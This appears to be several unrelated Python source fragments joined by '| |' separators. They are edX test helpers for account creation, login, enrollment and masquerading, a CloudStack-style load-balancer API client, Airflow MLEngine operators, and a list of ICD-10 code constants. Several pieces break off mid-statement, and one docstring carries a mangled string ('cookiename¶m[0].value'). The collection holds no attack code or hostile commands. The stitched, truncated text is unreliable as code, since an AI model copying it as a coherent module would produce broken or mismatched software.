chapter = ItemFactory.create(
parent_location=self.course.location,
category="sequential",
)
self.section = ItemFactory.create(
parent_location=chapter.location,
category="sequential"
)
# username = robot{0}, password = '<PASSWORD>'
self.users = [
UserFactory.create()
for dummy0 in range(self.USER_COUNT)
]
for user in self.users:
CourseEnrollmentFactory.create(user=user, course_id=self.course.id)
        # log in all users for access to the XModule
self.clients = {user.username: Client() for user in self.users}
self.login_statuses = [
self.clients[user.username].login(
username=user.username, password='<PASSWORD>')
for user in self.users
]
assert all(self.login_statuses)
def setUp(self):
super().setUp()
self.setup_course()
self.initialize_module(metadata=self.METADATA, data=self.DATA)
def get_url(self, dispatch):
"""Return item url with dispatch."""
return reverse(
'xblock_handler',
args=(str(self.course.id), quote_slashes(self.item_url), 'xmodule_handler', dispatch)
)
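# --- Illustrative sketch (not part of the original module) ---
# A minimal example of how a concrete xmodule test might subclass
# BaseTestXmodule. The "html" category, the DATA/METADATA values, and the
# "render" dispatch below are placeholders, not taken from any real test.
#
#     class TestHtmlModule(BaseTestXmodule):
#         CATEGORY = "html"
#         DATA = "<html><p>Hello</p></html>"
#         METADATA = {"display_name": "Example HTML block"}
#
#         def test_render(self):
#             # setup_course() leaves one logged-in client per enrolled user
#             # in self.clients, keyed by username.
#             client = self.clients[self.users[0].username]
#             response = client.post(self.get_url("render"), {})
#             assert response.status_code == 200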
class XModuleRenderingTestBase(BaseTestXmodule): # lint-amnesty, pylint: disable=missing-class-docstring
def new_module_runtime(self):
"""
Create a runtime that actually does html rendering
"""
runtime = super().new_module_runtime()
runtime.render_template = render_to_string
return runtime
class LoginEnrollmentTestCase(TestCase):
"""
Provides support for user creation,
activation, login, and course enrollment.
"""
user = None
def setup_user(self):
"""
Create a user account, activate, and log in.
"""
self.email = '<EMAIL>' # lint-amnesty, pylint: disable=attribute-defined-outside-init
self.password = '<PASSWORD>' # lint-amnesty, pylint: disable=attribute-defined-outside-init
self.username = 'test' # lint-amnesty, pylint: disable=attribute-defined-outside-init
self.user = self.create_account(
self.username,
self.email,
self.password,
)
# activate_user re-fetches and returns the activated user record
self.user = self.activate_user(self.email)
self.login(self.email, self.password)
def assert_request_status_code(self, status_code, url, method="GET", **kwargs):
"""
Make a request to the specified URL and verify that it returns the
expected status code.
"""
make_request = getattr(self.client, method.lower())
response = make_request(url, **kwargs)
assert response.status_code == status_code, f'{method} request to {url} returned status code {response.status_code}, expected status code {status_code}' # pylint: disable=line-too-long
return response
def assert_account_activated(self, url, method="GET", **kwargs): # lint-amnesty, pylint: disable=missing-function-docstring
make_request = getattr(self.client, method.lower())
response = make_request(url, **kwargs)
message_list = list(messages.get_messages(response.wsgi_request))
assert len(message_list) == 1
assert 'success' in message_list[0].tags
assert 'You have activated your account.' in message_list[0].message
# ============ User creation and login ==============
def login(self, email, password):
"""
Login, check that the corresponding view's response has a 200 status code.
"""
resp = self.client.post(reverse('user_api_login_session', kwargs={'api_version': 'v1'}),
{'email': email, 'password': password})
assert resp.status_code == 200
def logout(self):
"""
        Log out; check that the logout view responds with a 200 status code.
"""
self.assert_request_status_code(200, reverse('logout'))
def create_account(self, username, email, password):
"""
Create the account and check that it worked.
"""
url = reverse('user_api_registration')
request_data = {
'username': username,
'email': email,
'password': password,
'name': 'username',
'terms_of_service': 'true',
'honor_code': 'true',
}
self.assert_request_status_code(200, url, method="POST", data=request_data)
# Check both that the user is created, and inactive
user = User.objects.get(email=email)
assert not user.is_active
return user
def activate_user(self, email):
"""
Look up the activation key for the user, then hit the activate view.
No error checking.
"""
activation_key = Registration.objects.get(user__email=email).activation_key
# and now we try to activate
url = reverse('activate', kwargs={'key': activation_key})
self.assert_account_activated(url)
# Now make sure that the user is now actually activated
user = User.objects.get(email=email)
assert user.is_active
# And return the user we fetched.
return user
def enroll(self, course, verify=False):
"""
Try to enroll and return boolean indicating result.
`course` is an instance of CourseBlock.
`verify` is an optional boolean parameter specifying whether we
want to verify that the student was successfully enrolled
in the course.
"""
resp = self.client.post(reverse('change_enrollment'), {
'enrollment_action': 'enroll',
'course_id': str(course.id),
'check_access': True,
})
result = resp.status_code == 200
if verify:
assert result
return result
def unenroll(self, course):
"""
Unenroll the currently logged-in user, and check that it worked.
`course` is an instance of CourseBlock.
"""
url = reverse('change_enrollment')
request_data = {
'enrollment_action': 'unenroll',
'course_id': str(course.id),
}
self.assert_request_status_code(200, url, method="POST", data=request_data)
class CourseAccessTestMixin(TestCase):
"""
Utility mixin for asserting access (or lack thereof) to courses.
If relevant, also checks access for courses' corresponding CourseOverviews.
"""
def assertCanAccessCourse(self, user, action, course):
"""
Assert that a user has access to the given action for a given course.
Test with both the given course and with a CourseOverview of the given
course.
Arguments:
user (User): a user.
action (str): type of access to test.
course (CourseBlock): a course.
"""
assert has_access(user, action, course)
assert has_access(user, action, CourseOverview.get_from_id(course.id))
def assertCannotAccessCourse(self, user, action, course):
"""
Assert that a user lacks access to the given action the given course.
Test with both the given course and with a CourseOverview of the given
course.
Arguments:
user (User): a user.
action (str): type of access to test.
course (CourseBlock): a course.
Note:
It may seem redundant to have one method for testing access
and another method for testing lack thereof (why not just combine
them into one method with a boolean flag?), but it makes reading
stack traces of failed tests easier to understand at a glance.
"""
assert not has_access(user, action, course)
assert not has_access(user, action, CourseOverview.get_from_id(course.id))
class MasqueradeMixin:
"""
Adds masquerade utilities for your TestCase.
Your test case class must have self.client. And can optionally have self.course if you don't want
to pass in the course parameter below.
"""
def update_masquerade(self, course=None, role='student', group_id=None, username=None, user_partition_id=None):
"""
Installs a masquerade for the specified user and course, to enable
the user to masquerade as belonging to the specific partition/group
combination.
Arguments:
course (object): a course or None for self.course
user_partition_id (int): the integer partition id, referring to partitions already
configured in the course.
            group_id (int): the integer group id, within the specified partition.
username (str): user to masquerade as
role (str): role to masquerade as
Returns: the response object for the AJAX call to update the user's masquerade.
"""
course = course or self.course
masquerade_url = reverse(
'masquerade_update',
kwargs={
'course_key_string': str(course.id),
}
)
response = self.client.post(
masquerade_url,
json.dumps({
'role': role,
'group_id': group_id,
'user_name': username,
'user_partition_id': user_partition_id,
}),
'application/json'
)
assert response.status_code == 200
assert response.json()['success'], response.json().get('error')
return response
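# --- Illustrative sketch (not part of the original module) ---
# How a test using MasqueradeMixin might switch the requesting user into a
# specific content group before exercising a view. The partition and group
# ids are placeholders and assume the course already defines that partition.
#
#     class TestSplitContent(MasqueradeMixin, ModuleStoreTestCase):
#         def test_masquerade_as_group(self):
#             self.update_masquerade(role='student', user_partition_id=0, group_id=1)
#             # ... then request course content and assert on the
#             # group-specific variant being rendered.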
def masquerade_as_group_member(user, course, partition_id, group_id):
"""
Installs a masquerade for the specified user and course, to enable
the user to masquerade as belonging to the specific partition/group
combination.
Arguments:
user (User): a user.
course (CourseBlock): a course.
partition_id (int): the integer partition id, referring to partitions already
configured in the course.
        group_id (int): the integer group id, within the specified partition.
Returns: the status code for the AJAX response to update the user's masquerade for
the specified course.
"""
request = _create_mock_json_request(
user,
data={"role": "student", "user_partition_id": partition_id, "group_id": group_id}
)
response | |
List by keyword
page -
pagesize -
page - Pagination
'''
if 'lbdeviceid' not in args:
raise RuntimeError("Missing required argument 'lbdeviceid'")
return self.request('listSrxFirewallNetworks', args)
def listNetscalerLoadBalancerNetworks(self, args={}):
'''
        lists networks that are using a netscaler load balancer device
args - A dictionary. The following are options for keys:
lbdeviceid - netscaler load balancer device ID
keyword - List by keyword
page -
pagesize -
page - Pagination
'''
if 'lbdeviceid' not in args:
raise RuntimeError("Missing required argument 'lbdeviceid'")
return self.request('listNetscalerLoadBalancerNetworks', args)
def createLoadBalancer(self, args={}):
'''
Create a load-balancer instance
args - A dictionary. The following are options for keys:
algorithm - load balancer algorithm (source, roundrobin, leastconn)
name - name of the load balancer rule
instanceport - the TCP port of the virtual machine where the network traffic will be load balanced to
networkid - The guest network the Load Balancer will be created for
scheme - the load balancer scheme. Supported value in this release is Internal
sourceipaddressnetworkid - the network id of the source ip address
sourceport - the source port the network traffic will be load balanced from
description - (optional) the description of the Load Balancer
sourceipaddress - (optional) the source ip address the network traffic will be load balanced from
'''
if 'algorithm' not in args:
raise RuntimeError("Missing required argument 'algorithm'")
if 'name' not in args:
raise RuntimeError("Missing required argument 'name'")
if 'instanceport' not in args:
raise RuntimeError("Missing required argument 'instanceport'")
if 'networkid' not in args:
raise RuntimeError("Missing required argument 'networkid'")
if 'scheme' not in args:
raise RuntimeError("Missing required argument 'scheme'")
if 'sourceipaddressnetworkid' not in args:
raise RuntimeError(
"Missing required argument 'sourceipaddressnetworkid'")
if 'sourceport' not in args:
raise RuntimeError("Missing required argument 'sourceport'")
return self.request('createLoadBalancer', args)
def createLoadBalancerRule(self, args={}):
'''
Creates a load balancer rule
args - A dictionary. The following are options for keys:
algorithm - load balancer algorithm (source, roundrobin, leastconn)
name - name of the load balancer rule
privateport - the private port of the private ip address/virtual machine
where the network traffic will be load balanced to
publicport - the public port from where the network traffic will be load
balanced from
account - the account associated with the load balancer. Must be used with
the domainId parameter.
cidrlist - the cidr list to forward traffic from
description - the description of the load balancer rule
domainid - the domain ID associated with the load balancer
networkid - The guest network this rule will be created for
        openfirewall - if true, firewall rule for source/end public port is
        automatically created; if false - firewall rule has to be created explicitly.
        Has value true by default
publicipid - public ip address id from where the network traffic will be
load balanced from
zoneid - zone where the load balancer is going to be created. This parameter
is required when LB service provider is ElasticLoadBalancerVm
'''
if 'algorithm' not in args:
raise RuntimeError("Missing required argument 'algorithm'")
if 'name' not in args:
raise RuntimeError("Missing required argument 'name'")
if 'privateport' not in args:
raise RuntimeError("Missing required argument 'privateport'")
if 'publicport' not in args:
raise RuntimeError("Missing required argument 'publicport'")
return self.request('createLoadBalancerRule', args)
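    # --- Illustrative sketch (not part of the original client) ---
    # A minimal call showing the required keys for createLoadBalancerRule.
    # The client instance name (`api`) and the id values are placeholders.
    #
    #     rule = api.createLoadBalancerRule({
    #         'algorithm': 'roundrobin',
    #         'name': 'web-lb',
    #         'privateport': '8080',
    #         'publicport': '80',
    #         'publicipid': 'a1b2c3',   # optional: public IP to balance from
    #         'openfirewall': 'false',  # optional: manage the firewall rule yourself
    #     })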
def deleteLoadBalancerRule(self, args={}):
'''
Deletes a load balancer rule.
args - A dictionary. The following are options for keys:
id - the ID of the load balancer rule
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deleteLoadBalancerRule', args)
def removeFromLoadBalancerRule(self, args={}):
'''
Removes a virtual machine or a list of virtual machines from a load balancer
rule.
args - A dictionary. The following are options for keys:
id - The ID of the load balancer rule
virtualmachineids - the list of IDs of the virtual machines that are being
removed from the load balancer rule (i.e. virtualMachineIds=1,2,3)
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
if 'virtualmachineids' not in args:
raise RuntimeError("Missing required argument 'virtualmachineids'")
return self.request('removeFromLoadBalancerRule', args)
def assignToLoadBalancerRule(self, args={}):
'''
Assigns virtual machine or a list of virtual machines to a load balancer rule.
args - A dictionary. The following are options for keys:
id - the ID of the load balancer rule
virtualmachineids - the list of IDs of the virtual machine that are being
assigned to the load balancer rule(i.e. virtualMachineIds=1,2,3)
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
if 'virtualmachineids' not in args:
raise RuntimeError("Missing required argument 'virtualmachineids'")
return self.request('assignToLoadBalancerRule', args)
def createLBStickinessPolicy(self, args={}):
'''
Creates a Load Balancer stickiness policy
args - A dictionary. The following are options for keys:
lbruleid - the ID of the load balancer rule
methodname - name of the LB Stickiness policy method, possible values can be
obtained from ListNetworks API
name - name of the LB Stickiness policy
description - the description of the LB Stickiness policy
param - param list. Example:
param[0].name=cookiename¶m[0].value=LBCookie
'''
if 'lbruleid' not in args:
raise RuntimeError("Missing required argument 'lbruleid'")
if 'methodname' not in args:
raise RuntimeError("Missing required argument 'methodname'")
if 'name' not in args:
raise RuntimeError("Missing required argument 'name'")
return self.request('createLBStickinessPolicy', args)
def deleteLBStickinessPolicy(self, args={}):
'''
Deletes a LB stickiness policy.
args - A dictionary. The following are options for keys:
id - the ID of the LB stickiness policy
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deleteLBStickinessPolicy', args)
def listLoadBalancerRules(self, args={}):
'''
Lists load balancer rules.
args - A dictionary. The following are options for keys:
account - List resources by account. Must be used with the domainId
parameter.
domainid - list only resources belonging to the domain specified
id - the ID of the load balancer rule
isrecursive - defaults to false, but if true, lists all resources from the
parent specified by the domainId till leaves.
keyword - List by keyword
listall - If set to false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
name - the name of the load balancer rule
page -
pagesize -
projectid - list firewall rules by project
publicipid - the public IP address id of the load balancer rule
virtualmachineid - the ID of the virtual machine of the load balancer rule
zoneid - the availability zone ID
page - Pagination
'''
return self.request('listLoadBalancerRules', args)
def listLBStickinessPolicies(self, args={}):
'''
Lists LBStickiness policies.
args - A dictionary. The following are options for keys:
lbruleid - the ID of the load balancer rule
keyword - List by keyword
page -
pagesize -
page - Pagination
'''
if 'lbruleid' not in args:
raise RuntimeError("Missing required argument 'lbruleid'")
return self.request('listLBStickinessPolicies', args)
def listLoadBalancerRuleInstances(self, args={}):
'''
List all virtual machine instances that are assigned to a load balancer rule.
args - A dictionary. The following are options for keys:
id - the ID of the load balancer rule
applied - true if listing all virtual machines currently applied to the load
balancer rule; default is true
keyword - List by keyword
page -
pagesize -
page - Pagination
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('listLoadBalancerRuleInstances', args)
def updateLoadBalancerRule(self, args={}):
'''
Updates load balancer
args - A dictionary. The following are options for keys:
id - the id of the load balancer rule to update
algorithm - load balancer algorithm (source, roundrobin, leastconn)
description - the description of the load balancer rule
name - the name of the load balancer rule
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('updateLoadBalancerRule', args)
def addF5LoadBalancer(self, args={}):
'''
Adds a F5 BigIP load balancer device
args - A dictionary. The following are options for keys:
networkdevicetype - supports only F5BigIpLoadBalancer
password - <PASSWORD> reach F5 BigIP load balancer device
physicalnetworkid - the Physical Network ID
url - URL of the F5 load balancer | |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module contains GCP MLEngine operators.
"""
import re
import warnings
from typing import List, Optional
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator
from airflow.providers.google.cloud.hooks.mlengine import MLEngineHook
from airflow.utils.decorators import apply_defaults
from airflow.utils.log.logging_mixin import LoggingMixin
log = LoggingMixin().log
def _normalize_mlengine_job_id(job_id: str) -> str:
"""
Replaces invalid MLEngine job_id characters with '_'.
This also adds a leading 'z' in case job_id starts with an invalid
character.
:param job_id: A job_id str that may have invalid characters.
:type job_id: str:
:return: A valid job_id representation.
:rtype: str
"""
# Add a prefix when a job_id starts with a digit or a template
match = re.search(r'\d|\{{2}', job_id)
if match and match.start() == 0:
job = 'z_{}'.format(job_id)
else:
job = job_id
# Clean up 'bad' characters except templates
tracker = 0
cleansed_job_id = ''
for match in re.finditer(r'\{{2}.+?\}{2}', job):
cleansed_job_id += re.sub(r'[^0-9a-zA-Z]+', '_',
job[tracker:match.start()])
cleansed_job_id += job[match.start():match.end()]
tracker = match.end()
# Clean up last substring or the full string if no templates
cleansed_job_id += re.sub(r'[^0-9a-zA-Z]+', '_', job[tracker:])
return cleansed_job_id
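# --- Illustrative sketch (not part of the original module) ---
# Example inputs and outputs for the normalization above. The inputs are made
# up; the results follow directly from the regexes in _normalize_mlengine_job_id.
#
#     _normalize_mlengine_job_id("2020-01-01 train run")   -> "z_2020_01_01_train_run"
#     _normalize_mlengine_job_id("train-{{ ds_nodash }}")   -> "train_{{ ds_nodash }}"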
class MLEngineStartBatchPredictionJobOperator(BaseOperator):
"""
Start a Google Cloud ML Engine prediction job.
NOTE: For model origin, users should consider exactly one from the
three options below:
1. Populate ``uri`` field only, which should be a GCS location that
points to a tensorflow savedModel directory.
2. Populate ``model_name`` field only, which refers to an existing
model, and the default version of the model will be used.
3. Populate both ``model_name`` and ``version_name`` fields, which
refers to a specific version of a specific model.
In options 2 and 3, both model and version name should contain the
minimal identifier. For instance, call::
MLEngineBatchPredictionOperator(
...,
model_name='my_model',
version_name='my_version',
...)
if the desired model version is
``projects/my_project/models/my_model/versions/my_version``.
See https://cloud.google.com/ml-engine/reference/rest/v1/projects.jobs
for further documentation on the parameters.
:param job_id: A unique id for the prediction job on Google Cloud
ML Engine. (templated)
:type job_id: str
:param data_format: The format of the input data.
        It will default to 'DATA_FORMAT_UNSPECIFIED' if it is not provided
or is not one of ["TEXT", "TF_RECORD", "TF_RECORD_GZIP"].
:type data_format: str
:param input_paths: A list of GCS paths of input data for batch
prediction. Accepting wildcard operator ``*``, but only at the end. (templated)
:type input_paths: list[str]
:param output_path: The GCS path where the prediction results are
written to. (templated)
:type output_path: str
:param region: The Google Compute Engine region to run the
prediction job in. (templated)
:type region: str
:param model_name: The Google Cloud ML Engine model to use for prediction.
If version_name is not provided, the default version of this
model will be used.
Should not be None if version_name is provided.
Should be None if uri is provided. (templated)
:type model_name: str
:param version_name: The Google Cloud ML Engine model version to use for
prediction.
Should be None if uri is provided. (templated)
:type version_name: str
:param uri: The GCS path of the saved model to use for prediction.
Should be None if model_name is provided.
It should be a GCS path pointing to a tensorflow SavedModel. (templated)
:type uri: str
:param max_worker_count: The maximum number of workers to be used
for parallel processing. Defaults to 10 if not specified. Should be a
string representing the worker count ("10" instead of 10, "50" instead
of 50, etc.)
:type max_worker_count: str
:param runtime_version: The Google Cloud ML Engine runtime version to use
for batch prediction.
:type runtime_version: str
:param signature_name: The name of the signature defined in the SavedModel
to use for this job.
:type signature_name: str
:param project_id: The Google Cloud project name where the prediction job is submitted.
If set to None or missing, the default project_id from the GCP connection is used. (templated)
:type project_id: str
:param gcp_conn_id: The connection ID used for connection to Google
Cloud Platform.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must
have domain-wide delegation enabled.
:type delegate_to: str
:raises: ``ValueError``: if a unique model/version origin cannot be
determined.
"""
template_fields = [
'_project_id',
'_job_id',
'_region',
'_input_paths',
'_output_path',
'_model_name',
'_version_name',
'_uri',
]
@apply_defaults
def __init__(self, # pylint: disable=too-many-arguments
job_id: str,
region: str,
data_format: str,
input_paths: List[str],
output_path: str,
model_name: Optional[str] = None,
version_name: Optional[str] = None,
uri: Optional[str] = None,
max_worker_count: Optional[int] = None,
runtime_version: Optional[str] = None,
signature_name: Optional[str] = None,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
*args,
**kwargs) -> None:
super().__init__(*args, **kwargs)
self._project_id = project_id
self._job_id = job_id
self._region = region
self._data_format = data_format
self._input_paths = input_paths
self._output_path = output_path
self._model_name = model_name
self._version_name = version_name
self._uri = uri
self._max_worker_count = max_worker_count
self._runtime_version = runtime_version
self._signature_name = signature_name
self._gcp_conn_id = gcp_conn_id
self._delegate_to = delegate_to
if not self._project_id:
raise AirflowException('Google Cloud project id is required.')
if not self._job_id:
raise AirflowException(
                'A unique job id is required for Google MLEngine prediction '
'job.')
if self._uri:
if self._model_name or self._version_name:
raise AirflowException('Ambiguous model origin: Both uri and '
'model/version name are provided.')
if self._version_name and not self._model_name:
raise AirflowException(
'Missing model: Batch prediction expects '
'a model name when a version name is provided.')
if not (self._uri or self._model_name):
raise AirflowException(
'Missing model origin: Batch prediction expects a model, '
'a model & version combination, or a URI to a savedModel.')
def execute(self, context):
job_id = _normalize_mlengine_job_id(self._job_id)
prediction_request = {
'jobId': job_id,
'predictionInput': {
'dataFormat': self._data_format,
'inputPaths': self._input_paths,
'outputPath': self._output_path,
'region': self._region
}
}
if self._uri:
prediction_request['predictionInput']['uri'] = self._uri
elif self._model_name:
origin_name = 'projects/{}/models/{}'.format(
self._project_id, self._model_name)
if not self._version_name:
prediction_request['predictionInput'][
'modelName'] = origin_name
else:
prediction_request['predictionInput']['versionName'] = \
origin_name + '/versions/{}'.format(self._version_name)
if self._max_worker_count:
prediction_request['predictionInput'][
'maxWorkerCount'] = self._max_worker_count
if self._runtime_version:
prediction_request['predictionInput'][
'runtimeVersion'] = self._runtime_version
if self._signature_name:
prediction_request['predictionInput'][
'signatureName'] = self._signature_name
hook = MLEngineHook(self._gcp_conn_id, self._delegate_to)
# Helper method to check if the existing job's prediction input is the
# same as the request we get here.
def check_existing_job(existing_job):
return existing_job.get('predictionInput', None) == \
prediction_request['predictionInput']
finished_prediction_job = hook.create_job(
project_id=self._project_id, job=prediction_request, use_existing_job_fn=check_existing_job
)
if finished_prediction_job['state'] != 'SUCCEEDED':
self.log.error(
'MLEngine batch prediction job failed: %s', str(finished_prediction_job)
)
raise RuntimeError(finished_prediction_job['errorMessage'])
return finished_prediction_job['predictionOutput']
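# --- Illustrative sketch (not part of the original module) ---
# How the batch-prediction operator above might be wired into a DAG, using
# model_name only (option 2 from the class docstring). The project id, bucket
# paths, and the `dag` object are placeholders.
#
#     predict = MLEngineStartBatchPredictionJobOperator(
#         task_id="batch_predict",
#         project_id="my-gcp-project",
#         job_id="predict_{{ ds_nodash }}",
#         region="us-central1",
#         data_format="TEXT",
#         input_paths=["gs://my-bucket/input/*"],
#         output_path="gs://my-bucket/output/",
#         model_name="my_model",
#         dag=dag,
#     )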
class MLEngineManageModelOperator(BaseOperator):
"""
Operator for managing a Google Cloud ML Engine model.
.. warning::
This operator is deprecated. Consider using operators for specific operations:
MLEngineCreateModelOperator, MLEngineGetModelOperator.
:param model: A dictionary containing the information about the model.
If the `operation` is `create`, then the `model` parameter should
contain all the information about this model such as `name`.
If the `operation` is `get`, the `model` parameter
should contain the `name` of the model.
:type model: dict
:param operation: The operation to perform. Available operations are:
* ``create``: Creates a new model as provided by the `model` parameter.
* ``get``: Gets a particular model where the name is specified in `model`.
:type operation: str
:param project_id: The Google Cloud project name to which MLEngine model belongs.
If set to None or missing, the default project_id from the GCP connection is used. (templated)
:type project_id: str
:param gcp_conn_id: The connection ID to use when fetching connection info.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
"""
template_fields = [
'_project_id',
'_model',
]
@apply_defaults
def __init__(self,
model: dict,
operation: str = 'create',
| |
= "M51.2"
M51_3 = "M51.3"
M51_4 = "M51.4"
M51_8 = "M51.8"
M51_9 = "M51.9"
M53 = "M53"
M53_0 = "M53.0"
M53_1 = "M53.1"
M53_2 = "M53.2"
M53_3 = "M53.3"
M53_8 = "M53.8"
M53_9 = "M53.9"
M54 = "M54"
M54_0 = "M54.0"
M54_1 = "M54.1"
M54_2 = "M54.2"
M54_3 = "M54.3"
M54_4 = "M54.4"
M54_5 = "M54.5"
M54_6 = "M54.6"
M54_8 = "M54.8"
M54_9 = "M54.9"
M60_M79 = "M60-M79"
M60_M62 = "M60-M62"
M60 = "M60"
M60_0 = "M60.0"
M60_1 = "M60.1"
M60_2 = "M60.2"
M60_8 = "M60.8"
M60_9 = "M60.9"
M61 = "M61"
M61_0 = "M61.0"
M61_1 = "M61.1"
M61_2 = "M61.2"
M61_3 = "M61.3"
M61_4 = "M61.4"
M61_5 = "M61.5"
M61_9 = "M61.9"
M62 = "M62"
M62_0 = "M62.0"
M62_1 = "M62.1"
M62_2 = "M62.2"
M62_3 = "M62.3"
M62_4 = "M62.4"
M62_5 = "M62.5"
M62_6 = "M62.6"
M62_8 = "M62.8"
M62_9 = "M62.9"
M65_M67 = "M65-M67"
M65 = "M65"
M65_0 = "M65.0"
M65_1 = "M65.1"
M65_2 = "M65.2"
M65_3 = "M65.3"
M65_4 = "M65.4"
M65_8 = "M65.8"
M65_9 = "M65.9"
M66 = "M66"
M66_0 = "M66.0"
M66_1 = "M66.1"
M66_2 = "M66.2"
M66_3 = "M66.3"
M66_4 = "M66.4"
M66_5 = "M66.5"
M67 = "M67"
M67_0 = "M67.0"
M67_1 = "M67.1"
M67_2 = "M67.2"
M67_3 = "M67.3"
M67_4 = "M67.4"
M67_8 = "M67.8"
M67_9 = "M67.9"
M70_M79 = "M70-M79"
M70 = "M70"
M70_0 = "M70.0"
M70_1 = "M70.1"
M70_2 = "M70.2"
M70_3 = "M70.3"
M70_4 = "M70.4"
M70_5 = "M70.5"
M70_6 = "M70.6"
M70_7 = "M70.7"
M70_8 = "M70.8"
M70_9 = "M70.9"
M71 = "M71"
M71_0 = "M71.0"
M71_1 = "M71.1"
M71_2 = "M71.2"
M71_3 = "M71.3"
M71_4 = "M71.4"
M71_5 = "M71.5"
M71_8 = "M71.8"
M71_9 = "M71.9"
M72 = "M72"
M72_0 = "M72.0"
M72_1 = "M72.1"
M72_2 = "M72.2"
M72_3 = "M72.3"
M72_4 = "M72.4"
M72_5 = "M72.5"
M72_6 = "M72.6"
M72_8 = "M72.8"
M72_9 = "M72.9"
M75 = "M75"
M75_0 = "M75.0"
M75_1 = "M75.1"
M75_2 = "M75.2"
M75_3 = "M75.3"
M75_4 = "M75.4"
M75_5 = "M75.5"
M75_8 = "M75.8"
M75_9 = "M75.9"
M76 = "M76"
M76_0 = "M76.0"
M76_1 = "M76.1"
M76_2 = "M76.2"
M76_3 = "M76.3"
M76_4 = "M76.4"
M76_5 = "M76.5"
M76_6 = "M76.6"
M76_7 = "M76.7"
M76_8 = "M76.8"
M76_9 = "M76.9"
M77 = "M77"
M77_0 = "M77.0"
M77_1 = "M77.1"
M77_2 = "M77.2"
M77_3 = "M77.3"
M77_4 = "M77.4"
M77_5 = "M77.5"
M77_8 = "M77.8"
M77_9 = "M77.9"
M79 = "M79"
M79_0 = "M79.0"
M79_1 = "M79.1"
M79_2 = "M79.2"
M79_3 = "M79.3"
M79_4 = "M79.4"
M79_5 = "M79.5"
M79_6 = "M79.6"
M79_7 = "M79.7"
M79_8 = "M79.8"
M79_9 = "M79.9"
M80_M94 = "M80-M94"
M80_M85 = "M80-M85"
M80 = "M80"
M80_0 = "M80.0"
M80_1 = "M80.1"
M80_2 = "M80.2"
M80_3 = "M80.3"
M80_4 = "M80.4"
M80_5 = "M80.5"
M80_8 = "M80.8"
M80_9 = "M80.9"
M81 = "M81"
M81_0 = "M81.0"
M81_1 = "M81.1"
M81_2 = "M81.2"
M81_3 = "M81.3"
M81_4 = "M81.4"
M81_5 = "M81.5"
M81_6 = "M81.6"
M81_8 = "M81.8"
M81_9 = "M81.9"
M83 = "M83"
M83_0 = "M83.0"
M83_1 = "M83.1"
M83_2 = "M83.2"
M83_3 = "M83.3"
M83_4 = "M83.4"
M83_5 = "M83.5"
M83_8 = "M83.8"
M83_9 = "M83.9"
M84 = "M84"
M84_0 = "M84.0"
M84_1 = "M84.1"
M84_2 = "M84.2"
M84_3 = "M84.3"
M84_4 = "M84.4"
M84_8 = "M84.8"
M84_9 = "M84.9"
M85 = "M85"
M85_0 = "M85.0"
M85_1 = "M85.1"
M85_2 = "M85.2"
M85_3 = "M85.3"
M85_4 = "M85.4"
M85_5 = "M85.5"
M85_6 = "M85.6"
M85_8 = "M85.8"
M85_9 = "M85.9"
M86_M89 = "M86-M89"
M86 = "M86"
M86_0 = "M86.0"
M86_1 = "M86.1"
M86_2 = "M86.2"
M86_3 = "M86.3"
M86_4 = "M86.4"
M86_5 = "M86.5"
M86_6 = "M86.6"
M86_8 = "M86.8"
M86_9 = "M86.9"
M87 = "M87"
M87_0 = "M87.0"
M87_1 = "M87.1"
M87_2 = "M87.2"
M87_3 = "M87.3"
M87_8 = "M87.8"
M87_9 = "M87.9"
M88 = "M88"
M88_0 = "M88.0"
M88_8 = "M88.8"
M88_9 = "M88.9"
M89 = "M89"
M89_0 = "M89.0"
M89_1 = "M89.1"
M89_2 = "M89.2"
M89_3 = "M89.3"
M89_4 = "M89.4"
M89_5 = "M89.5"
M89_6 = "M89.6"
M89_8 = "M89.8"
M89_9 = "M89.9"
M91_M94 = "M91-M94"
M91 = "M91"
M91_0 = "M91.0"
M91_1 = "M91.1"
M91_2 = "M91.2"
M91_3 = "M91.3"
M91_8 = "M91.8"
M91_9 = "M91.9"
M92 = "M92"
M92_0 = "M92.0"
M92_1 = "M92.1"
M92_2 = "M92.2"
M92_3 = "M92.3"
M92_4 = "M92.4"
M92_5 = "M92.5"
M92_6 = "M92.6"
M92_7 = "M92.7"
M92_8 = "M92.8"
M92_9 = "M92.9"
M93 = "M93"
M93_0 = "M93.0"
M93_1 = "M93.1"
M93_2 = "M93.2"
M93_8 = "M93.8"
M93_9 = "M93.9"
M94 = "M94"
M94_0 = "M94.0"
M94_1 = "M94.1"
M94_2 = "M94.2"
M94_3 = "M94.3"
M94_8 = "M94.8"
M94_9 = "M94.9"
M95_M99 = "M95-M99"
M95 = "M95"
M95_0 = "M95.0"
M95_1 = "M95.1"
M95_2 = "M95.2"
M95_3 = "M95.3"
M95_4 = "M95.4"
M95_5 = "M95.5"
M95_8 = "M95.8"
M95_9 = "M95.9"
M99 = "M99"
M99_0 = "M99.0"
M99_1 = "M99.1"
M99_2 = "M99.2"
M99_3 = "M99.3"
M99_4 = "M99.4"
M99_5 = "M99.5"
M99_6 = "M99.6"
M99_7 = "M99.7"
M99_8 = "M99.8"
M99_9 = "M99.9"
N00_N98 = "N00-N98"
N00_N07 = "N00-N07"
N00 = "N00"
